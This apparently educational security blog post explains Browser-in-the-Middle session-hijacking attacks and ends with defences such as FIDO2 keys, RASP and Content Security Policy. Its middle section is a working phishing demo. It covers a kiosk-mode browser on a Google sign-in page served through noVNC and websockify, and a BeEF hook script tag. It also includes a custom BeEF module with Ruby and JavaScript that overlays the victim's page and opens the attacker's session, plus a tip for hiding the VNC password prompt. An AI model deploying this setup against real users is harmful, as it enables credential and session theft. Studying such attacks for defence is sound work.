Understanding Browser-in-the-Middle (BitM) Attacks
The Hidden Threat of Token Theft and Real-Time User Impersonation
Introduction
One of the most critical threats in cybersecurity is session hijacking. In simple terms session hijacking means whenever you log into any platform after completing a MFA and successfully being authenticated a session token is generated which is stored in your browser to maintain the authenticated state. But if this session token gets stolen then the attacker can bypass your password and even MFA because your session is already authenticated. If an attacker steals this token, they can paste it into their own browser and impersonate you. This can easily be done using a Browser-in-the-Middle (BitM) attack.
What is Browser in the middle attack?
BitM is like an advanced version of Man in the Middle(MitM) attack. In MitM attack an attacker secretly intercepts or alters communication between two parties. It functions at the network level, means if you’re connected to an insecure or public network, a hacker on that same network can sit in between you and the site you’re trying to access. They can sniff your data and hijack your session tokens. However in BitM attack instead of just sitting in the middle and reading data, the attacker sets up a fake browser between you and the real website. It’s like you’re using a browser, but it’s actually running on the attacker’s computer. Your every action including the authentication step you take is mirrored and recorded by the attacker’s tools like keyloggers, web proxies, sniffers, and even malicious browser extensions.
How a BitM Attack Unfolds
| Step | Description |
| Phishing Link | You receive a phishing link that leads to the attacker’s server. |
| Attacker-Controlled Browser | When you click the link, you’re routed through a real browser session running on the attacker’s server created using tools like noVNC. |
| Transparent Proxy | This browser is invisible to you and it looks like the real site, but every action is monitored and manipulated by the attacker. |
| Data Capture Tools | The attacker uses web proxies, keyloggers, and sniffers to capture your credentials, session tokens, and even MFA codes. |
| Session Hijack | Once you authenticate, your session token is stolen and can be used by the attacker to impersonate you on the real site so no password or MFA is needed. |
How BitM attack takes place and why is it hard to detect
Browser-in-the-Middle (BitM) attacks are difficult to detect because they exploit tools and browser features like noVNC, VNC, and browser kiosk mode to create authentic-looking invisible hijacking environment. VNC (Virtual Network Computing) is a technology that lets one computer remotely control another’s desktop. noVNC is a web-based VNC client that allows this remote control to happen inside your browser, using only HTML5 and JavaScript. So what attackers actually do is
They set up a VNC server running a browser (like Chrome or Firefox) in kiosk mode(it is a browser setting that runs the browser in full-screen, hiding all toolbars, address bars, and navigation buttons preventing the victim from seeing the actual url) on their infrastructure.
when the victim opens the link the attacker’s server responds by sending JavaScript code to the victim's browser using a tool like noVNC. The JavaScript starts a WebSocket connection back to the attacker’s server.
The attacker uses websockify (a tool that converts the websocket traffic to normal TCP traffic) to route this WebSocket traffic to a local VNC server that they set already. Then the victim’s browser unknowingly starts a VNC session over WebSocket with the attacker's platform.
Using HTML5 the attacker creates a webpage that looks exactly like the legitimate site the victim intended to visit and every action the victim takes is now happening on the attacker’s server. They can now steal the session tokens once the victim login into the account using tools like Evilginx2
BitM attacks are hard to detect because they use real browsers, real websites, and hide all the usual warning signs using the above mentioned tools. Hence they can bypass HTTPS protocols as well.
The key difference between MitM attack and BitM attack
MitM attacks rely on network-level manipulation and may require malware to be installed on the victim’s device.
BitM attacks runs a full browser session on the attacker’s infrastructure making the detection harder because the victim sees a legitimate site and browser interface, while MitM attacks may trigger browser or security warnings if SSL/TLS is tampered.
Building a BitM Attack Demo with noVNC, VNC, and BeEF
Let’s try to build a phishing-like environment where we (attacker) run a browser on our own VNC server and proxy it to the web with noVNC and websockify showing a real login page. Then we’ll use use Beef to hook a victim’s browser execute a payload that opens the custom noVNC page for the victim to click and open in a browser tab that connects to that remote browser session so we can see everything that the victim does.
we install all the required tools-
xfce4: Lightweight desktop environment for our VNC session.
tigervnc-standalone-server: The VNC server.
novnc: The web-based VNC client.
websockify: Bridges WebSocket (browser) to VNC’s TCP.
nginx: Web server for optional reverse proxy.
Beef- to hook browser and execute payload
Set Up the VNC Server with a Browser
Start a VNC server with XFCE desktop:
vncserver :2 -geometry 1280x800 -localhost noThe
:2 means display 2 (port 5902).
Then we Launch a browser
export DISPLAY=:1 firefox --kioskhttps://accounts.google.com/signin&To view the XFCE desktop environment after launching a browser, you need to connect to your running VNC session using a VNC client. For that I have installed a vnc client TigerVNC Viewer.
Once it is installed I have opened it and connected it to the IP of my host machine
In the vnc viewer enter you ip address: 1 (display 1 that corresponds to port 5901 where your vnc server is running).
Once we successfully connect we will land inside XFCE desktop environment running inside a TigerVNC viewer window as shown in the image below.
Set Up noVNC and websockify
Now we start websockify to serve noVNC and proxy to your VNC server:
websockify --web /usr/share/novnc/ 6080 localhost:59016080is the port for browser access.localhost:5901 is the VNC server.
/usr/share/novnc/is our noVNC install pathWe open it in the browser
Hook the browser and execute the payload
Once we have cloned beef and installed all the dependencies we can start beef
./beef(here as this starts running inside the terminal note down beef hook URL it looks like this<script src="http://<your IP>:3000/hook.js"></script>)and access the beef UI by going tohttp://localhost:3000/ui/panelin our browser.Create an html file mimicking a login or landing page including the hook URL and serve this page using python’s http server. Your malicious page will be available at:
http://<ip>:8080/malicious_page.html
Now once you open this page in the browser the page will load and the browser will be "hooked" by BeEF. In BeEF GUI, you will now see:
The hooked browser appear under "Online Browsers" (left panel)
Browser details like OS, browser type, etc.
Create a Custom BeEF Module (noVNC Redirect)
In your terminal navigate beef modules directory and create a new file and create the module configuration file config.yaml and paste the below code.
beef: module: novnc_redirect: enable: true category: "Exploitation" name: "noVNC Redirect Attack" description: "Redirects victim browser to attacker's noVNC session" authors: ["YourName"] target: working: ["ALL"]Now Create the Ruby Module File module.rb and paste this content
class Novnc_redirect < BeEF::Core::Command def self.options [ {'name' => 'novnc_url', 'ui_label' => 'noVNC URL', 'value' => 'http://192.168.29.150:6080/vnc.html'}, {'name' => 'delay', 'ui_label' => 'Delay (seconds)', 'value' => '3'} ] end def post_execute content = {} content['result'] = @datastore['result'] save content end endAfter this create the JavaScript Payload
beef.execute(function() { var novnc_url = '<%= @novnc_url %>'; var delay = parseInt('<%= @delay %>') * 1000; setTimeout(function() { // Create overlay to hide the redirection var overlay = document.createElement('div'); overlay.style.cssText = 'position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999;text-align:center;padding-top:200px;font-family:Arial;'; overlay.innerHTML = '<h2>Redirecting to secure session...</h2><p>Please wait...</p>'; document.body.appendChild(overlay); // Open noVNC in new window/tab setTimeout(function() { window.open(novnc_url, '_blank', 'fullscreen=yes,menubar=no,toolbar=no,location=no,status=no'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=noVNC session opened successfully'); }, 1000); }, delay); });Execute the attack
Restart BeEF to load the new module. In the BeEF UI select the hooked browser under online browsers go to the commands tab now when you execute this will redirect you to the novnc page and prompt you to enter the password because VNC server is password-protected. However to make the attack seamless and avoid showing the password prompt to make the attack more convincing, you can pass the password in the URL so noVNC auto-connects
http://:6080/vnc.html?autoconnect=true&password=YOURVNCPASSWORD
The victim’s browser (the one open to your fake login page) will be redirected to the noVNC page.
If everything is set up, they will see your XFCE desktop streamed in their browser via noVNC
Here we can observe that this is a remote desktop (of the attacker that is running on XFCE4 desktop) opened in the victims browser!!!!
Detection Techniques: How to Identify and Prevent BitM
Detecting BitM attack is challenging since the attacker operates within the user's browser session which makes their presence nearly invisible to traditional monitoring tools.
Prevention methods:
Use of hardware security keys like FIDO2
FIDO2 security keys are small physical devices often USB or Bluetooth that act as a second layer of security when logging into your accounts. The FIDO2 key won’t work unless it verifies two things:
That you are physically present (by requiring a touch or tap)
That the website you’re logging into is genuine (by checking the domain).
When you try to log in, your FIDO2 key checks if the website address (URL) is genuine. By any chance if a hacker tricks you into visiting a fake page your FIDO2 key refuses to authenticate because of the incorrect domain.
The Fido2 key generates a unique cryptographic signature that only works for the real site. So if a BitM attacker intercepts your session, they can’t reuse the login token they’d have to fool the key, which they can’t.
Runtime Application self protection.
Runtime Application Self-Protection (RASP) is a security technology built into your software applications. Unlike traditional security systems like firewalls or antivirus that sit on the outside, RASP operates from inside the application while it’s running. When your app runs, RASP starts monitoring everything in real-time and can stop any malicious behavior.
Enforcing Trusted Script Execution in the Browser
We can by restrict what JavaScript is allowed to run within the browser using Content Security Policy(CSP). This is a security header that defines trusted sources for content. A strict CSP script execution, ensures that only scripts explicitly tagged by the server can execute. This mitigates the risk of malicious inline scripts injected via BitM.
References
https://www.scworld.com/news/microsoft-365-credentials-stolen-via-adversary-in-the-middle-campaign
https://cloud.google.com/blog/topics/threat-intelligence/session-stealing-browser-in-the-middle
https://www.researchgate.net/publication/350955017_Browser-in-the-Middle_BitM_attack
